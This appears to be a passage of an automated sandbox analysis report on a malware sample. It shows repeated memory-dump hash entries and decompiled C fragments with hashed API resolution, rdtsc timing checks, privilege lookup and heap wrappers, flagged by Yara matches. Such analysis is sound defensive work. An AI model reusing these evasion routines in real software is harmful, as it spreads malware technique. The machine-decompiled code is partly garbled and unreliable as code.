                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000005.00000002.378918668.0000000000A50000.00000040.00000001.sdmp, Offset: 00A50000, based on PE: true
                                      Similarity
                                      • API ID: InitializeThunk
                                      • String ID:
                                      • API String ID: 2994545307-0
                                      • Opcode ID: 55af104e65493959a3b045fc209df0a4fc67bea0fd4d261e75c82f7522778e97
                                      • Instruction ID: ca347d956d130fc28e9bf3ecbfcfc175f6ca726f6af44adc79914e3c3c1641a5
                                      • Opcode Fuzzy Hash: 55af104e65493959a3b045fc209df0a4fc67bea0fd4d261e75c82f7522778e97
                                      • Instruction Fuzzy Hash: 3290026160500502D30171694404B16000A97D0381F92C036A1114595ECA658992F171
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000005.00000002.378918668.0000000000A50000.00000040.00000001.sdmp, Offset: 00A50000, based on PE: true
                                      Similarity
                                      • API ID: InitializeThunk
                                      • String ID:
                                      • API String ID: 2994545307-0
                                      • Opcode ID: 7eabb48c259bb7b693792b69cfcdbbaf4cc8ebc98c062eef8b1e13ddbf4ad1df
                                      • Instruction ID: 47e3c99fb5e71eb188e40da21ff5119dcd9d9a48cd65bc5c51f461d00f38e03c
                                      • Opcode Fuzzy Hash: 7eabb48c259bb7b693792b69cfcdbbaf4cc8ebc98c062eef8b1e13ddbf4ad1df
                                      • Instruction Fuzzy Hash: 9B90027120500413D31161694504B07000997D0381F92C436A0514598D96968952F161
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000005.00000002.378918668.0000000000A50000.00000040.00000001.sdmp, Offset: 00A50000, based on PE: true
                                      Similarity
                                      • API ID: InitializeThunk
                                      • String ID:
                                      • API String ID: 2994545307-0
                                      • Opcode ID: 1df5af19f398aa5e1449371e36dfa91e6ac0e31a47086ca7718e99c651ee7b47
                                      • Instruction ID: 3d3d17baa0602041cc143a76009b3f3fa99b49e95e50b47cc2ee624adef075e7
                                      • Opcode Fuzzy Hash: 1df5af19f398aa5e1449371e36dfa91e6ac0e31a47086ca7718e99c651ee7b47
                                      • Instruction Fuzzy Hash: 10900261246041525745B1694404A074006A7E0381792C036A1504990C85669856E661
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000005.00000002.378918668.0000000000A50000.00000040.00000001.sdmp, Offset: 00A50000, based on PE: true
                                      Similarity
                                      • API ID: InitializeThunk
                                      • String ID:
                                      • API String ID: 2994545307-0
                                      • Opcode ID: 5f02b987e84a2bf44f29fb82309372205d625bac10cc0758a179ea3cefaa8914
                                      • Instruction ID: c026f655fec7fa114ab613049bd28a9a4c0a60f4a22d9b6420e8ea7a610899b8
                                      • Opcode Fuzzy Hash: 5f02b987e84a2bf44f29fb82309372205d625bac10cc0758a179ea3cefaa8914
                                      • Instruction Fuzzy Hash: 3C9002A134500442D30061694414F060005D7E1341F52C039E1154594D8659CC52B166
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000005.00000002.378918668.0000000000A50000.00000040.00000001.sdmp, Offset: 00A50000, based on PE: true
                                      Similarity
                                      • API ID: InitializeThunk
                                      • String ID:
                                      • API String ID: 2994545307-0
                                      • Opcode ID: d177ac9f029d5cbe6d9ab378e25ccc84729e077cda3ce39aca23f9526e6c152b
                                      • Instruction ID: 51b2ab36ccd8a3418056d602dac2de474d8b3dd97001d7f37f8fc799697b06e9
                                      • Opcode Fuzzy Hash: d177ac9f029d5cbe6d9ab378e25ccc84729e077cda3ce39aca23f9526e6c152b
                                      • Instruction Fuzzy Hash: 139002B120500402D34071694404B46000597D0341F52C035A5154594E86998DD5B6A5
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000005.00000002.378918668.0000000000A50000.00000040.00000001.sdmp, Offset: 00A50000, based on PE: true
                                      Similarity
                                      • API ID: InitializeThunk
                                      • String ID:
                                      • API String ID: 2994545307-0
                                      • Opcode ID: 6ef5b5a9c25c2270d0afa3a0f40a788ca74ae82ef3af4d381feba62222488011
                                      • Instruction ID: 01bdc4a1eab63954c2403bd72f59dccc8c5e2dd31fc2bd06c26da9b2c7d2dd71
                                      • Opcode Fuzzy Hash: 6ef5b5a9c25c2270d0afa3a0f40a788ca74ae82ef3af4d381feba62222488011
                                      • Instruction Fuzzy Hash: 1A90026160500042434071798844E064005BBE1351752C135A0A88590D85998865A6A5
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000005.00000002.378918668.0000000000A50000.00000040.00000001.sdmp, Offset: 00A50000, based on PE: true
                                      Similarity
                                      • API ID: InitializeThunk
                                      • String ID:
                                      • API String ID: 2994545307-0
                                      • Opcode ID: 424a4366bc60731b194a54b1a0206c8e6790e0376b178187627ebd0c0579b9b7
                                      • Instruction ID: fbad0c2c4dcec2923ebb553f7525d3212f8f99b3f91adfd1834d07fcbcd40fbf
                                      • Opcode Fuzzy Hash: 424a4366bc60731b194a54b1a0206c8e6790e0376b178187627ebd0c0579b9b7
                                      • Instruction Fuzzy Hash: AB90027120540402D30061694814B0B000597D0342F52C035A1254595D86658851B5B1
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000005.00000002.378918668.0000000000A50000.00000040.00000001.sdmp, Offset: 00A50000, based on PE: true
                                      Similarity
                                      • API ID: InitializeThunk
                                      • String ID:
                                      • API String ID: 2994545307-0
                                      • Opcode ID: 69251470b054167587144225613d435ddac39fb37cedd54a47e8a637dfcb2ca8
                                      • Instruction ID: ae7da978a7e5cde2a2f0c6cb20f3141907a17bba57da171a0684a8b24ad60794
                                      • Opcode Fuzzy Hash: 69251470b054167587144225613d435ddac39fb37cedd54a47e8a637dfcb2ca8
                                      • Instruction Fuzzy Hash: D790026121580042D30065794C14F07000597D0343F52C139A0244594CC9558861A561
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000005.00000002.378918668.0000000000A50000.00000040.00000001.sdmp, Offset: 00A50000, based on PE: true
                                      Similarity
                                      • API ID: InitializeThunk
                                      • String ID:
                                      • API String ID: 2994545307-0
                                      • Opcode ID: 797798abf11402d3515bbf2e2054553b757dc12ab012c32876eb4273776634f0
                                      • Instruction ID: 6381622d47ce0e66eb2de472c1f860bcdd3cab034cd1b972542807a7c8a8d7b0
                                      • Opcode Fuzzy Hash: 797798abf11402d3515bbf2e2054553b757dc12ab012c32876eb4273776634f0
                                      • Instruction Fuzzy Hash: F39002A120600003430571694414B16400A97E0341B52C035E11045D0DC5658891B165
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000005.00000002.378918668.0000000000A50000.00000040.00000001.sdmp, Offset: 00A50000, based on PE: true
                                      Similarity
                                      • API ID: InitializeThunk
                                      • String ID:
                                      • API String ID: 2994545307-0
                                      • Opcode ID: 2c685e1bf2ffcbef8aeaf0caa9d5810a29604edb2db45c430f1a2c5df5253f61
                                      • Instruction ID: b8fd0063769497a3c4a5a0bd6fe35cb974202eb275c34afae74f1d5b9240f4ad
                                      • Opcode Fuzzy Hash: 2c685e1bf2ffcbef8aeaf0caa9d5810a29604edb2db45c430f1a2c5df5253f61
                                      • Instruction Fuzzy Hash: 37900265215000030305A5690704A07004697D5391352C035F1105590CD6618861A161
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000005.00000002.378918668.0000000000A50000.00000040.00000001.sdmp, Offset: 00A50000, based on PE: true
                                      Similarity
                                      • API ID: InitializeThunk
                                      • String ID:
                                      • API String ID: 2994545307-0
                                      • Opcode ID: 517d64f09a84495556f18a2c36617c4eebc6565cc665ab382a9f3fe36f1f8912
                                      • Instruction ID: 1be88d5a2eb8e1157703dafa4542dbe18b3bff5bb0e0eea057e283ca6be5da01
                                      • Opcode Fuzzy Hash: 517d64f09a84495556f18a2c36617c4eebc6565cc665ab382a9f3fe36f1f8912
                                      • Instruction Fuzzy Hash: 9A90027120508802D31061698404B4A000597D0341F56C435A4514698D86D58891B161
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000005.00000002.378918668.0000000000A50000.00000040.00000001.sdmp, Offset: 00A50000, based on PE: true
                                      Similarity
                                      • API ID: InitializeThunk
                                      • String ID:
                                      • API String ID: 2994545307-0
                                      • Opcode ID: e2ad52f04dcbd3adec45e5557663e323cdc2a281221a9cebe1a983fd8a6a78e4
                                      • Instruction ID: 2100620bea3a32f8e19b9d102ffd03e8059d5de84ad96fdeb43e22a3d7cdc196
                                      • Opcode Fuzzy Hash: e2ad52f04dcbd3adec45e5557663e323cdc2a281221a9cebe1a983fd8a6a78e4
                                      • Instruction Fuzzy Hash: 1B90027120500802D38071694404B4A000597D1341F92C039A0115694DCA558A59B7E1
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000005.00000002.378918668.0000000000A50000.00000040.00000001.sdmp, Offset: 00A50000, based on PE: true
                                      Similarity
                                      • API ID: InitializeThunk
                                      • String ID:
                                      • API String ID: 2994545307-0
                                      • Opcode ID: 3a9afe3398ff3f7ae5f3414cc529eb05932eeebb581f26b5e19c55083342f285
                                      • Instruction ID: 1ceede0a7cb670c4d60282d1e800704b6b0748993a5cb60170de2753694ab54e
                                      • Opcode Fuzzy Hash: 3a9afe3398ff3f7ae5f3414cc529eb05932eeebb581f26b5e19c55083342f285
                                      • Instruction Fuzzy Hash: DC90026130500003D34071695418B064005E7E1341F52D035E0504594CD9558856A262
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000005.00000002.378918668.0000000000A50000.00000040.00000001.sdmp, Offset: 00A50000, based on PE: true
                                      Similarity
                                      • API ID: InitializeThunk
                                      • String ID:
                                      • API String ID: 2994545307-0
                                      • Opcode ID: 685c5ce58910f45f5f8e916c1c367af7efa0d2c4020190b4dcefcb5254ece0fa
                                      • Instruction ID: 6ab0d2ee7abec32692453d5130e9f00ba43068ef8c65de180ea78c516198fc8e
                                      • Opcode Fuzzy Hash: 685c5ce58910f45f5f8e916c1c367af7efa0d2c4020190b4dcefcb5254ece0fa
                                      • Instruction Fuzzy Hash: 8290026921700002D38071695408B0A000597D1342F92D439A0105598CC9558869A361
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000005.00000002.378918668.0000000000A50000.00000040.00000001.sdmp, Offset: 00A50000, based on PE: true
                                      Similarity
                                      • API ID: InitializeThunk
                                      • String ID:
                                      • API String ID: 2994545307-0
                                      • Opcode ID: 9fc8663e18b459676708d7c861d57229102882c7bc1d90b4b1587300a555a7b2
                                      • Instruction ID: 13b9e750c891e9de3df035afe71697c3ad864ce51e480c7cae803506e194450d
                                      • Opcode Fuzzy Hash: 9fc8663e18b459676708d7c861d57229102882c7bc1d90b4b1587300a555a7b2
                                      • Instruction Fuzzy Hash: 7490027131514402D31061698404B06000597D1341F52C435A0914598D86D58891B162
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000005.00000002.378918668.0000000000A50000.00000040.00000001.sdmp, Offset: 00A50000, based on PE: true
                                      Similarity
                                      • API ID: InitializeThunk
                                      • String ID:
                                      • API String ID: 2994545307-0
                                      • Opcode ID: 0cc879964c8d0a8f2b28df8f6bd27908440274e00633c100f94010c983c626a4
                                      • Instruction ID: 4fc44ef761ff19529dbd619fe24a43887543a74015ed4c8e16905f9e288fe321
                                      • Opcode Fuzzy Hash: 0cc879964c8d0a8f2b28df8f6bd27908440274e00633c100f94010c983c626a4
                                      • Instruction Fuzzy Hash: 6990027120500402D30065A95408B46000597E0341F52D035A5114595EC6A58891B171
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 93%
                                      			E004088D0(intOrPtr* _a4) {
                                      				intOrPtr _v8;
                                      				char _v24;
                                      				char _v284;
                                      				char _v804;
                                      				char _v840;
                                      				void* _t24;
                                      				void* _t31;
                                      				void* _t33;
                                      				void* _t34;
                                      				void* _t39;
                                      				void* _t50;
                                      				intOrPtr* _t52;
                                      				void* _t53;
                                      				void* _t54;
                                      				void* _t55;
                                      				void* _t56;
                                      
                                      				_t52 = _a4;
                                      				_t39 = 0; // executed
                                      				_t24 = E00406E20(_t52,  &_v24); // executed
                                      				_t54 = _t53 + 8;
                                      				if(_t24 != 0) {
                                      					E00407030( &_v24,  &_v840);
                                      					_t55 = _t54 + 8;
                                      					do {
                                      						E0041A0F0( &_v284, 0x104);
                                      						E0041A760( &_v284,  &_v804);
                                      						_t56 = _t55 + 0x10;
                                      						_t50 = 0x4f;
                                      						while(1) {
                                      							_t31 = E00413DF0(E00413D90(_t52, _t50),  &_v284);
                                      							_t56 = _t56 + 0x10;
                                      							if(_t31 != 0) {
                                      								break;
                                      							}
                                      							_t50 = _t50 + 1;
                                      							if(_t50 <= 0x62) {
                                      								continue;
                                      							} else {
                                      							}
                                      							goto L8;
                                      						}
                                      						_t9 = _t52 + 0x14; // 0xffffe1a5
                                      						 *(_t52 + 0x474) =  *(_t52 + 0x474) ^  *_t9;
                                      						_t39 = 1;
                                      						L8:
                                      						_t33 = E00407060( &_v24,  &_v840);
                                      						_t55 = _t56 + 8;
                                      					} while (_t33 != 0 && _t39 == 0);
                                      					_t34 = E004070E0(_t52,  &_v24); // executed
                                      					if(_t39 == 0) {
                                      						asm("rdtsc");
                                      						asm("rdtsc");
                                      						_v8 = _t34 - 0 + _t34;
                                      						 *((intOrPtr*)(_t52 + 0x55c)) =  *((intOrPtr*)(_t52 + 0x55c)) + 0xffffffba;
                                      					}
                                      					 *((intOrPtr*)(_t52 + 0x31)) =  *((intOrPtr*)(_t52 + 0x31)) + _t39;
                                      					_t20 = _t52 + 0x31; // 0x5608758b
                                      					 *((intOrPtr*)(_t52 + 0x32)) =  *((intOrPtr*)(_t52 + 0x32)) +  *_t20 + 1;
                                      					return 1;
                                      				} else {
                                      					return _t24;
                                      				}
                                      			}



















                                      0x004088db
                                      0x004088e3
                                      0x004088e5
                                      0x004088ea
                                      0x004088ef
                                      0x00408902
                                      0x00408907
                                      0x00408910
                                      0x0040891c
                                      0x0040892f
                                      0x00408934
                                      0x00408937
                                      0x00408940
                                      0x00408952
                                      0x00408957
                                      0x0040895c
                                      0x00000000
                                      0x00000000
                                      0x0040895e
                                      0x00408962
                                      0x00000000
                                      0x00000000
                                      0x00408964
                                      0x00000000
                                      0x00408962
                                      0x00408966
                                      0x00408969
                                      0x0040896f
                                      0x00408971
                                      0x0040897c
                                      0x00408981
                                      0x00408984
                                      0x00408991
                                      0x0040899c
                                      0x0040899e
                                      0x004089a4
                                      0x004089a8
                                      0x004089ab
                                      0x004089ab
                                      0x004089b2
                                      0x004089b5
                                      0x004089ba
                                      0x004089c7
                                      0x004088f6
                                      0x004088f6
                                      0x004088f6

                                      Memory Dump Source
                                      • Source File: 00000005.00000002.378660694.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000005.00000002.378652760.0000000000400000.00000002.00020000.sdmp
                                      • Associated: 00000005.00000002.378679115.000000000041D000.00000040.00020000.sdmp
                                      • Associated: 00000005.00000002.378686607.000000000041E000.00000020.00020000.sdmp
                                      Yara matches
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 25b9e4bfeadf490359593a5bd4afb5d1c4bb2ba5ede10faa6f148f0b6e30c1a6
                                      • Instruction ID: a66f789b9c9346c4209e30225a072a2b07741faaa143dbde407d40e20ce1c0b9
                                      • Opcode Fuzzy Hash: 25b9e4bfeadf490359593a5bd4afb5d1c4bb2ba5ede10faa6f148f0b6e30c1a6
                                      • Instruction Fuzzy Hash: BD21FBB2C4420957CB15E6649E42BFF737C9B54304F04057FE989A3181F639AB4987A7
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 60%
                                      			E00407226(void* __ebx, intOrPtr* _a4, intOrPtr _a8, long _a12) {
                                      				char _v64;
                                      				void* _t8;
                                      				void* _t10;
                                      				int _t11;
                                      				void* _t23;
                                      				void* _t26;
                                      				long _t29;
                                      				int _t33;
                                      				void* _t35;
                                      
                                      				asm("fiadd dword [esi-0x19]");
                                      				asm("int3");
                                      				if(__ebx - 1 >= 0) {
                                      					 *[cs:eax] =  *[cs:eax] + _t8;
                                      					E0041AD20( &_v64, 3);
                                      					_t10 = E00409B40(__eflags, _a8 + 0x1c,  &_v64); // executed
                                      					_t11 = E00413E50(_a8 + 0x1c, _t10, 0, 0, 0xc4e7b6d6);
                                      					_t33 = _t11;
                                      					__eflags = _t33;
                                      					if(_t33 != 0) {
                                      						_t29 = _a12;
                                      						_t11 = PostThreadMessageW(_t29, 0x111, 0, 0); // executed
                                      						__eflags = _t11;
                                      						if(__eflags == 0) {
                                      							_t11 =  *_t33(_t29, 0x8003, _t35 + (E004092A0(__eflags, 1, 8) & 0x000000ff) - 0x40, _t11);
                                      						}
                                      					}
                                      					return _t11;
                                      				} else {
                                      					asm("sti");
                                      					_push(_t35);
                                      					_t26 = E004199F0(_t23);
                                      					if(_t26 == 0 || _t26 == 0x33333333) {
                                      						__eflags = 0;
                                      						return 0;
                                      					} else {
                                      						return  *_a4 + _t26;
                                      					}
                                      				}
                                      			}












                                      0x00407227
                                      0x0040722a
                                      0x0040722b
                                      0x00407295
                                      0x0040729e
                                      0x004072ae
                                      0x004072be
                                      0x004072c3
                                      0x004072c8
                                      0x004072ca
                                      0x004072cd
                                      0x004072da
                                      0x004072dc
                                      0x004072de
                                      0x004072fb
                                      0x004072fb
                                      0x004072fd
                                      0x00407302
                                      0x0040722d
                                      0x0040722d
                                      0x00407230
                                      0x00407238
                                      0x0040723c
                                      0x0040724f
                                      0x00407252
                                      0x00407246
                                      0x0040724e
                                      0x0040724e
                                      0x0040723c

                                      APIs
                                      • PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 004072DA
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000005.00000002.378660694.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000005.00000002.378652760.0000000000400000.00000002.00020000.sdmp
                                      • Associated: 00000005.00000002.378679115.000000000041D000.00000040.00020000.sdmp
                                      • Associated: 00000005.00000002.378686607.000000000041E000.00000020.00020000.sdmp
                                      Yara matches
                                      Similarity
                                      • API ID: MessagePostThread
                                      • String ID: 3333
                                      • API String ID: 1836367815-2924271548
                                      • Opcode ID: d0f49b6c557c57bd69689eecb791474343fa6f0706b0a24d00684018ef9fb871
                                      • Instruction ID: bb3da49a10280d2408cfb47af4fb67369b480fbd4d95926373e596e4ef66396c
                                      • Opcode Fuzzy Hash: d0f49b6c557c57bd69689eecb791474343fa6f0706b0a24d00684018ef9fb871
                                      • Instruction Fuzzy Hash: F001DB32B402187BEB255A959C42FBE73585F41724F09456EFE04FB2C1D978BD0147DA
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 75%
                                      			E00418922(void* __eax, void* __esi, void* __eflags) {
                                      				void* _t15;
                                      				void* _t21;
                                      				void* _t25;
                                      
                                      				asm("in al, 0x5a");
                                      				if(__eflags >= 0) {
                                      					__esp = __esp -  *__eax;
                                      					_t6 = __eax;
                                      					__eax = __ebp;
                                      					__ebp = _t6;
                                      					__esi = __esi -  *((intOrPtr*)(__ebp - 0x68d1285a));
                                      					__eflags = __esi;
                                      					_push(__ebp);
                                      					__ebp = __esp;
                                      					__eax =  *((intOrPtr*)(__ebp + 8));
                                      					_push(__esi);
                                      					__esi =  *((intOrPtr*)(__ebp + 8)) + 0xc7c;
                                      					__eax =  *__esi;
                                      					ExitProcess( *(__ebp + 0xc));
                                      				}
                                      				_push(__esi);
                                      				E004191E0(_t21, __eax, __eax + 0xc70,  *((intOrPtr*)(__eax + 0x10)), 0, 0x34);
                                      				_t5 = _t25 + 0xc; // 0x413536
                                      				_t15 = RtlAllocateHeap( *_t5,  *(_t25 + 0x10),  *(_t25 + 0x14)); // executed
                                      				return _t15;
                                       			}

                                      APIs
                                      • RtlAllocateHeap.NTDLL(65A,?,00413CAF,00413CAF,?,00413536,?,?,?,?,?,00000000,00408B13,?), ref: 004188DD
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000005.00000002.378660694.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                       • Associated: 00000005.00000002.378652760.0000000000400000.00000002.00020000.sdmp
                                       • Associated: 00000005.00000002.378679115.000000000041D000.00000040.00020000.sdmp
                                       • Associated: 00000005.00000002.378686607.000000000041E000.00000020.00020000.sdmp
                                      Yara matches
                                      Similarity
                                      • API ID: AllocateHeap
                                      • String ID: 65A
                                      • API String ID: 1279760036-2085483392
                                      • Opcode ID: 7d1722c8af5a631259abeede85f067216dd937713950d848d5cf086466221e74
                                      • Instruction ID: d37eb002c2572a8e9385782245005f4739f68624aaf3d765969823bc7484deb9
                                      • Opcode Fuzzy Hash: 7d1722c8af5a631259abeede85f067216dd937713950d848d5cf086466221e74
                                      • Instruction Fuzzy Hash: 15E0EDB2600210BFDB04EF24DC48EE77768AF85314F000149F9082B181C631F915CBA0
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 100%
                                      			E004188B0(intOrPtr _a4, char _a8, long _a12, long _a16) {
                                      				intOrPtr _t7;
                                      				void* _t10;
                                      				void* _t15;
                                      
                                      				_t7 = _a4;
                                      				E004191E0(_t15, _t7, _t7 + 0xc70,  *((intOrPtr*)(_t7 + 0x10)), 0, 0x34);
                                      				_t6 =  &_a8; // 0x413536
                                      				_t10 = RtlAllocateHeap( *_t6, _a12, _a16); // executed
                                      				return _t10;
                                       			}

                                      APIs
                                      • RtlAllocateHeap.NTDLL(65A,?,00413CAF,00413CAF,?,00413536,?,?,?,?,?,00000000,00408B13,?), ref: 004188DD
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000005.00000002.378660694.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                       • Associated: 00000005.00000002.378652760.0000000000400000.00000002.00020000.sdmp
                                       • Associated: 00000005.00000002.378679115.000000000041D000.00000040.00020000.sdmp
                                       • Associated: 00000005.00000002.378686607.000000000041E000.00000020.00020000.sdmp
                                      Yara matches
                                      Similarity
                                      • API ID: AllocateHeap
                                      • String ID: 65A
                                      • API String ID: 1279760036-2085483392
                                      • Opcode ID: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
                                      • Instruction ID: 6af236cfb772a66706e6e9b9d52e602bd21d3a4cd2a65313634d6b12f98b32f7
                                      • Opcode Fuzzy Hash: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
                                      • Instruction Fuzzy Hash: BDE012B1200208ABDB14EF99CC45EA777ACAF88654F118559FA085B242CA30F910CAB0
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 82%
                                      			E00407280(void* __eflags, intOrPtr _a4, long _a8) {
                                      				char _v67;
                                      				char _v68;
                                      				void* _t10;
                                      				void* _t12;
                                      				intOrPtr* _t13;
                                      				int _t14;
                                      				long _t21;
                                      				intOrPtr* _t25;
                                      				void* _t26;
                                      				void* _t30;
                                      
                                      				_t30 = __eflags;
                                      				_v68 = 0;
                                      				_t10 = E0041A140( &_v67, 0, 0x3f);
                                      				 *[cs:eax] =  *[cs:eax] + _t10;
                                      				E0041AD20( &_v68, 3);
                                      				_t12 = E00409B40(_t30, _a4 + 0x1c,  &_v68); // executed
                                      				_t13 = E00413E50(_a4 + 0x1c, _t12, 0, 0, 0xc4e7b6d6);
                                      				_t25 = _t13;
                                      				if(_t25 != 0) {
                                      					_t21 = _a8;
                                      					_t14 = PostThreadMessageW(_t21, 0x111, 0, 0); // executed
                                      					_t32 = _t14;
                                      					if(_t14 == 0) {
                                      						_t14 =  *_t25(_t21, 0x8003, _t26 + (E004092A0(_t32, 1, 8) & 0x000000ff) - 0x40, _t14);
                                      					}
                                      					return _t14;
                                      				}
                                      				return _t13;
                                       			}

                                      APIs
                                      • PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 004072DA
                                      Memory Dump Source
                                      • Source File: 00000005.00000002.378660694.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                       • Associated: 00000005.00000002.378652760.0000000000400000.00000002.00020000.sdmp
                                       • Associated: 00000005.00000002.378679115.000000000041D000.00000040.00020000.sdmp
                                       • Associated: 00000005.00000002.378686607.000000000041E000.00000020.00020000.sdmp
                                      Yara matches
                                      Similarity
                                      • API ID: MessagePostThread
                                      • String ID:
                                      • API String ID: 1836367815-0
                                      • Opcode ID: c0b1965486bbed21c20c63ece949b1f46c1b03fe5ed161d661499a1b38bcdbd6
                                      • Instruction ID: 93bd109d16e53c8762968f959fe3c9c023db94cb098c15d1529cbaaabdda2f39
                                      • Opcode Fuzzy Hash: c0b1965486bbed21c20c63ece949b1f46c1b03fe5ed161d661499a1b38bcdbd6
                                      • Instruction Fuzzy Hash: F001D431A8022977E720AA959C03FFE772C5B00B55F04006EFF04BA1C2E6A8790542EA
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 37%
                                      			E00418A41(intOrPtr _a4, WCHAR* _a8, WCHAR* _a12, struct _LUID* _a16) {
                                      				int _t12;
                                      				void* _t17;
                                      
                                      				asm("sbb al, 0xad");
                                      				asm("out dx, al");
                                      				asm("loop 0x71");
                                      				asm("adc dword [eax+0x42], 0x558001fe");
                                      				_t9 = _a4;
                                      				E004191E0(_t17, _a4, _a4 + 0xc8c,  *((intOrPtr*)(_t9 + 0xa18)), 0, 0x46);
                                      				_t12 = LookupPrivilegeValueW(_a8, _a12, _a16); // executed
                                      				return _t12;
                                       			}

                                      APIs
                                      • LookupPrivilegeValueW.ADVAPI32(00000000,00000041,0040CFC2,0040CFC2,00000041,00000000,?,00408B85), ref: 00418A80
                                      Memory Dump Source
                                      • Source File: 00000005.00000002.378660694.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                       • Associated: 00000005.00000002.378652760.0000000000400000.00000002.00020000.sdmp
                                       • Associated: 00000005.00000002.378679115.000000000041D000.00000040.00020000.sdmp
                                       • Associated: 00000005.00000002.378686607.000000000041E000.00000020.00020000.sdmp
                                      Yara matches
                                      Similarity
                                      • API ID: LookupPrivilegeValue
                                      • String ID:
                                      • API String ID: 3899507212-0
                                      • Opcode ID: f725a72bedf8c0ff181c2956e0e1214f8de1bef356d8e08221fc1d92a17afd5d
                                      • Instruction ID: 9c8d8015ae29351a61f88a0b021781761be0796261ca022bcdc066489fd6541c
                                      • Opcode Fuzzy Hash: f725a72bedf8c0ff181c2956e0e1214f8de1bef356d8e08221fc1d92a17afd5d
                                      • Instruction Fuzzy Hash: BEF0E2B52102046BDB24EF84DC45ED73778EF84390F00405AFA0C5B202D535EC12C7B4
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 64%
                                      			E004188E2(void* __ebx, intOrPtr _a12, void* _a16, long _a20, void* _a24) {
                                      				char _t13;
                                      				void* _t20;
                                      
                                      				_pop(ss);
                                      				asm("adc dh, [edi-0x741374ab]");
                                      				_t10 = _a12;
                                      				_t4 = _t10 + 0xc74; // 0xc74
                                      				E004191E0(_t20, _a12, _t4,  *((intOrPtr*)(_a12 + 0x10)), 0, 0x35);
                                      				_t13 = RtlFreeHeap(_a16, _a20, _a24); // executed
                                      				return _t13;
                                       			}

                                      APIs
                                      • RtlFreeHeap.NTDLL(00000060,00408B13,?,?,00408B13,00000060,00000000,00000000,?,?,00408B13,?,00000000), ref: 0041891D
                                      Memory Dump Source
                                      • Source File: 00000005.00000002.378660694.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                       • Associated: 00000005.00000002.378652760.0000000000400000.00000002.00020000.sdmp
                                       • Associated: 00000005.00000002.378679115.000000000041D000.00000040.00020000.sdmp
                                       • Associated: 00000005.00000002.378686607.000000000041E000.00000020.00020000.sdmp
                                      Yara matches
                                      Similarity
                                      • API ID: FreeHeap
                                      • String ID:
                                      • API String ID: 3298025750-0
                                      • Opcode ID: fecbff86ccccd9137869245da2cc6efcea64c78036194e6694fcea5b9838fcc0
                                      • Instruction ID: 6c9a6f2228e3fe3dc02cfb538dd98853b085b7272bc1ed21640716773b5544fd
                                      • Opcode Fuzzy Hash: fecbff86ccccd9137869245da2cc6efcea64c78036194e6694fcea5b9838fcc0
                                      • Instruction Fuzzy Hash: 94E068F82081C56BEB12EF78D8D08DB7F90AF81220708858EECD807307C525D55ACB70
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 100%
                                      			E004188F0(intOrPtr _a4, void* _a8, long _a12, void* _a16) {
                                      				char _t10;
                                      				void* _t15;
                                      
                                      				_t3 = _a4 + 0xc74; // 0xc74
                                      				E004191E0(_t15, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x35);
                                      				_t10 = RtlFreeHeap(_a8, _a12, _a16); // executed
                                      				return _t10;
                                       			}

                                      APIs
                                      • RtlFreeHeap.NTDLL(00000060,00408B13,?,?,00408B13,00000060,00000000,00000000,?,?,00408B13,?,00000000), ref: 0041891D
                                      Memory Dump Source
